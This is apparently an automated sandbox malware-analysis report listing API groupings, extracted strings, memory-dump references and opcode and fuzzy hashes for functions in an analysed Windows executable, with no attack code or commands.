                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 74418370-0
                                                                                                            • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                            • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                                                                            • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                            • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectorywcslenwcsncpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 961886536-0
                                                                                                            • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                            • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                                                                            • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                            • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CommonControlsInitInitializememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2179856907-0
                                                                                                            • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                            • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                                                                            • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                            • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$Value
                                                                                                            • String ID:
                                                                                                            • API String ID: 3898337583-0
                                                                                                            • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                                                                            • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                                                                            • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                                                                            • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CodeExitProcess
                                                                                                            • String ID: open
                                                                                                            • API String ID: 3861947596-2758837156
                                                                                                            • Opcode ID: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
                                                                                                            • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                                                                            • Opcode Fuzzy Hash: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
                                                                                                            • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                                                                            • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                                                              • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                                                              • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                                                              • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 547990026-0
                                                                                                            • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                            • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                                                                            • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                            • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: ExceptionHandlerVectored$Remove
• String ID:
• API String ID: 3670940754-0
• Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
• Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
• Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
• Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

Control-flow Graph

control_flow_graph 668 14000da6c-14000da80 670 14000da82-14000da85 668->670 671 14000da9f 668->671 673 14000da92-14000da9d DeleteFileW 670->673 674 14000da87-14000da8c SetFileAttributesW 670->674 672 14000daa1-14000daa6 671->672 673->672 674->673
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: File$AttributesDelete
• String ID:
• API String ID: 2910425767-0
• Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
• Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
• Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
• Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222

Control-flow Graph

control_flow_graph 675 140012060-140012090 HeapCreate TlsAlloc call 140012bf0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: AllocHeap$CreateValue
• String ID:
• API String ID: 493873155-0
• Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
• Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
• Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
• Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: DestroyFreeHeap
• String ID:
• API String ID: 3293292866-0
• Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
• Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
• Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
• Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: Heap$AllocFreememset
• String ID:
• API String ID: 3063399779-0
• Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
• Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
• Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
• Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: AllocHeapValue
• String ID:
• API String ID: 2362848668-0
• Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
• Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
• Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
• Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: CloseFreeHandleHeap
• String ID:
• API String ID: 1642312469-0
• Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
• Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
• Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
• Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: AllocHeapwcslen
• String ID:
• API String ID: 746647629-0
• Opcode ID: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
• Instruction ID: 39c3555cb5e633ae9f9a5314a67da5fdcb628df671bb12a0019ba56a0bb7f9c1
• Opcode Fuzzy Hash: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
• Instruction Fuzzy Hash: 3DF0E276608A8082D621DB1AE44134AA7B1F3C9BC4F104125EBCC83B69CF3EC9518A00
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
• Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
• Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
• Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3978063606-0
                                                                                                            • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                            • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                                                                            • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                            • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 1611563598-0
                                                                                                            • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                            • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                                                                            • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                            • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 10892065-0
                                                                                                            • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                            • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                                                                            • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                            • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHandlerRemoveVectored
                                                                                                            • String ID:
                                                                                                            • API String ID: 1340492425-0
                                                                                                            • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                            • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                                                                            • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                            • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                                                                            • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                                                                            • API String ID: 9748049-1690119102
                                                                                                            • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                                                                            • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                                                                            • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                                                                            • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                            • API String ID: 0-2665694366
                                                                                                            • Opcode ID: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                                                                            • Instruction ID: 94762fe19e52a1e76ee8dc23a2b1d827446cec64643fb03410c83a9544901dbd
                                                                                                            • Opcode Fuzzy Hash: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                                                                            • Instruction Fuzzy Hash: 9452D2726106608BE72ACF26D49CBED37E5F3487C4F414129EB868B7A4E77AC845CB50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                                                                            • API String ID: 0-4074041902
                                                                                                            • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                                                                            • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                                                                            • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                                                                            • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
